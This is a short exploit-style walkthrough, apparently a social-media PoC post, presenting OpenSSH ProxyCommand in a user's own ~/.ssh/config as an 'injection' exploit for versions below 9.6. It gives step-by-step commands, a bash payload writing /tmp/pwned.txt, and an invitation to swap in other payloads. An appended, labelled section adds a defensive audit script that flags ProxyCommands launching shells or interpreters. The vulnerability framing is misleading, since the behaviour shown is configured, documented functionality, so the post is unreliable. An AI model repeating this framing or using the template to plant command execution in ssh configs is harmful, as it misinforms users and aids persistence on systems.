### Objective

1. Exploit OpenSSH's ProxyCommand injection to:
   1. Create a file (e.g., `/tmp/pwned.txt`)
   2. Insert custom content into it (e.g., `You’ve been hacked via ProxyCommand`)

### Prerequisites

1. Any Linux-based system with OpenSSH version < 9.6
2. Access to the system via SSH (credentialed)

### Procedure

1. Check the OpenSSH version with:

   ```
   ssh -V
   ```

2. Check for a config file in the `.ssh` folder:

   ```
   ls -lah ~/.ssh
   ```

3. If a config file is available, skip to step 4. Otherwise, create one with:

   ```
   mkdir -p ~/.ssh
   cp ~/.ssh/config ~/.ssh/config.bak 2>/dev/null
   touch ~/.ssh/config
   ```

4. Edit the config file using:

   ```
   nano ~/.ssh/config
   ```

5. Insert the following block:

   ```
   Host pwned-target
       HostName 127.0.0.1
       ProxyCommand bash -c 'echo "You’ve been hacked via ProxyCommand" > /tmp/pwned.txt'
   ```

   Here, __pwned-target__ can be any name you want, and the IP address can be any IP; it is just a __placeholder__. The payload executes before that address is even contacted.

6. Save and close nano with:

   ```
   Ctrl+O
   Ctrl+X
   ```

7. In the terminal, run:

   ```
   ssh pwned-target
   ```

   Here __pwned-target__ is the Host we set in the config file, which triggers the proxy command

   ```
   'echo "You’ve been hacked via ProxyCommand" > /tmp/pwned.txt'
   ```

   creating the file __pwned.txt__ in the __/tmp__ folder.

8. To validate that the exploit ran successfully, check with:

   ```
   cd /tmp
   ls -lah
   cat pwned.txt
   ```

9. You can change the payload in the `ProxyCommand` section.

If you like this PoC, please share it and follow me on Twitter: [@saarcastified](https://x.com/saarcastified)
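Because a `ProxyCommand` in a user's own `~/.ssh/config` runs on the local machine before any connection to `HostName` is attempted, the block from step 5 is easy to spot by auditing config files. The following POSIX shell script is an added example, not part of the original post: it lists every Host alias that sets a `ProxyCommand` and, as a heuristic, flags the ones whose command starts a shell or script interpreter rather than a forwarder such as `ssh`, `nc` or `socat`. The function names and the embedded sample config are constructed for this example.

```shell
#!/bin/sh
# Added example, not from the original post: audit an ssh_config-style file
# for Host blocks that set ProxyCommand. Output is one line per directive,
# "<host alias><TAB><command>"; directives before any Host line show as "*".
list_proxycommands() {
    awk -F'[ \t=]+' '
        { sub(/^[ \t]+/, "") }                  # ssh_config allows indented lines
        /^#/ || NF == 0 { next }                # skip comments and blank lines
        tolower($1) == "host" { host = $2 }     # remember the current alias
        tolower($1) == "proxycommand" {
            cmd = substr($0, length($1) + 1)    # everything after the keyword
            sub(/^[ \t=]+/, "", cmd)            # drop the separator (space or =)
            printf "%s\t%s\n", (host == "" ? "*" : host), cmd
        }
    ' "$1"
}

# Heuristic filter: keep only ProxyCommands whose first word (path stripped)
# is a shell or scripting interpreter. A forwarder like "ssh -W" is not flagged.
flag_interpreter_proxycommands() {
    list_proxycommands "$1" |
        awk -F'\t' '{ split($2, w, /[ \t]+/); n = w[1]; sub(/.*\//, "", n) }
                    n ~ /^(sh|bash|dash|zsh|python[0-9.]*|perl)$/'
}

# Constructed sample config for a stand-alone run (not a real user's file).
write_sample_config() {
    cat > "$1" <<'EOF'
# legitimate jump host: forwards the connection, runs no shell
Host bastion
    HostName bastion.example.com
    ProxyCommand ssh -W %h:%p jump.example.com
Host pwned-target
    HostName 127.0.0.1
    ProxyCommand bash -c 'echo test > /tmp/pwned.txt'
Host plain
    HostName plain.example.com
EOF
}

if [ "${1:-}" = "--demo" ]; then
    tmp=$(mktemp)
    write_sample_config "$tmp"
    flag_interpreter_proxycommands "$tmp"   # prints only the pwned-target line
    rm -f "$tmp"
fi
```

Run it as `sh audit.sh --demo` for the built-in sample, or call `flag_interpreter_proxycommands ~/.ssh/config` (and the same for `/etc/ssh/ssh_config`) on a real system; a flagged alias is worth a manual look, since the command runs every time that alias is used.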